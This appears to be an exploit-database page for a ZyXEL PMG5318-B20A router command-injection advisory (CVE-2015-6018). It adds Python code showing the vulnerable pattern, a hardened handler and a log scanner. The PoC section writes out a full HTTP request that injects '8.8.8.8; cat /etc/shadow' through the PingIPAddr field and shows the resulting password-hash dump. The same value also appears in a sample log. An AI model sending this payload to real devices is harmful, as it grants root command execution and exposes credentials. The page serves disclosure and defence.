| Title | Published | Views | Family |
|---|---|---|---|
| ZyXEL PMG5318-B20A - OS Command Injection Vulnerability | 14 Oct 2015 00:00 | – | zdt |
| ZyXEL PMG5318-B20A diagnostic ping function input validation vulnerability | 23 Oct 2015 00:00 | – | cnvd |
| CVE-2015-6018 | 31 Dec 2015 02:00 | – | cve |
| CVE-2015-6018 | 31 Dec 2015 02:00 | – | cvelist |
| ZYXEL PMG5318-B20A - OS Command Injection | 14 Oct 2015 00:00 | – | exploitpack |
| CVE-2015-6018 | 31 Dec 2015 05:59 | – | nvd |
| ZyXEL PMG5318-B20A OS Command Injection | 14 Oct 2015 00:00 | – | packetstorm |
| Design/Logic Flaw | 31 Dec 2015 05:59 | – | prion |
| ZyXEL NBG-418N, PMG5318-B20A and P-660HW-T1 routers contain multiple vulnerabilities | 13 Oct 2015 00:00 | – | cert |
# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]
# Discovered by: Karn Ganeshen
# CERT VU# 870744
# Vendor Homepage: [www.zyxel.com]
# Version Reported: [Firmware version V100AANC0b5]
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]
*Vulnerability Details*
CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input Validation - CVE-2015-6018
The diagnostic ping function's PingIPAddr parameter in the ZyXEL PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user input. An attacker can execute arbitrary commands as root.
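As an added example, written for this page and not taken from the vendor's firmware or from the reporter's PoC, the following shows the anti-pattern the advisory describes (an untrusted form field concatenated into a shell command line) beside a hardened handler that only accepts a literal IP address for PingIPAddr and runs ping without a shell, together with a detection-side scan over constructed request-log lines. The function names, the log line format and the sample lines are assumptions; the device's real log format is not documented here.

```python
import ipaddress
import re
import subprocess

# Characters a shell would interpret; any of them in a "ping target" is a red flag.
_SHELL_META = re.compile(r"[;&|`$<>\n\r\\(){}\[\]*?!'\"]")


def build_ping_command_vulnerable(ping_ip_addr: str) -> str:
    """The anti-pattern the advisory describes (reconstructed, not the vendor's code):
    the raw form field is concatenated into a command line that a shell will parse."""
    return "ping -c 4 " + ping_ip_addr


def validate_ping_target(ping_ip_addr: str) -> str:
    """Allow-list validation: the value must parse as a literal IPv4/IPv6 address.
    Returns the canonical address string or raises ValueError."""
    try:
        return str(ipaddress.ip_address(ping_ip_addr.strip()))
    except ValueError:
        raise ValueError("rejected PingIPAddr value: %r" % ping_ip_addr) from None


def is_accepted(ping_ip_addr: str) -> bool:
    """True if the value passes validate_ping_target, False otherwise."""
    try:
        validate_ping_target(ping_ip_addr)
        return True
    except ValueError:
        return False


def build_ping_command_hardened(ping_ip_addr: str) -> list:
    """Hardened form: validated target, passed as its own argv element."""
    target = validate_ping_target(ping_ip_addr)
    return ["ping", "-c", "4", target]


def run_ping(ping_ip_addr: str) -> str:
    """Execute the hardened command with shell=False, so no character in the
    argument is ever interpreted as command syntax. The CGI helper should also
    run as an unprivileged user rather than root, so a future bug cannot expose
    /etc/shadow the way the advisory's PoC does."""
    argv = build_ping_command_hardened(ping_ip_addr)
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=30)
    return proc.stdout


def looks_like_injection(ping_ip_addr: str) -> bool:
    """Detection-side check: flag values carrying shell metacharacters."""
    return bool(_SHELL_META.search(ping_ip_addr))


# Constructed sample of a request log in a hypothetical field=value format.
SAMPLE_LOG = [
    '2015-10-14T00:00:01Z POST /diagnostic/diagnostic_general.cgi PingIPAddr="8.8.8.8"',
    '2015-10-14T00:00:02Z POST /diagnostic/diagnostic_general.cgi PingIPAddr="8.8.8.8; cat /etc/shadow"',
    '2015-10-14T00:00:03Z POST /diagnostic/diagnostic_general.cgi PingIPAddr="2001:db8::1"',
]

_PING_FIELD = re.compile(r'PingIPAddr="([^"]*)"')


def scan_request_log(lines):
    """Return (line_number, value) for every PingIPAddr value that either fails
    the allow-list check or carries shell metacharacters."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = _PING_FIELD.search(line)
        if not m:
            continue
        value = m.group(1)
        if not is_accepted(value) or looks_like_injection(value):
            hits.append((n, value))
    return hits


if __name__ == "__main__":
    for n, value in scan_request_log(SAMPLE_LOG):
        print("line %d: suspicious PingIPAddr %r" % (n, value))
    print(build_ping_command_hardened("8.8.8.8"))
```

The design choice worth noting is that the hardened path never tries to strip or escape bad characters: it parses the value as an address and rejects anything else, and it hands the result to the process as a separate argv element so there is no shell to interpret it. The metacharacter check is kept for log review only, since an allow-list is the control and a deny-list is merely a signal.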
*OS Command Injection PoC*
The underlying services run as 'root'; the injection therefore allows dumping the system password hashes.
*HTTP Request*
POST /diagnostic/diagnostic_general.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>/diagnostic/diagnostic_general.cgi
Cookie: session=a457f8ad83ba22dc256cd0b002c66666
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12062103314079176991367286444
Content-Length: 451

-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="InfoDisplay"

-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="PingIPAddr"

8.8.8.8; cat /etc/shadow
-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="Submit"

Ping
....
*HTTP Response*
.....
<snipped>
<br class="clearfloat" />
<!-- configuration beginning -->
<div class="headline"><span class="cTitle">General</span></div>
<table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" class="cfgpadding">
<tr>
<td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100" readonly="readonly">
root:<hash>:15986:0:99999:7:::
lp:*:13013:0:99999:7:::
nobody:*:13013:0:99999:7:::
admin:<hash>:16035:0:99999:7:::
user:<hash>:16035:0:99999:7:::
</textarea></td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" class="cfgpadding">
<tr>
-----------------------------12062103314079176991367286444--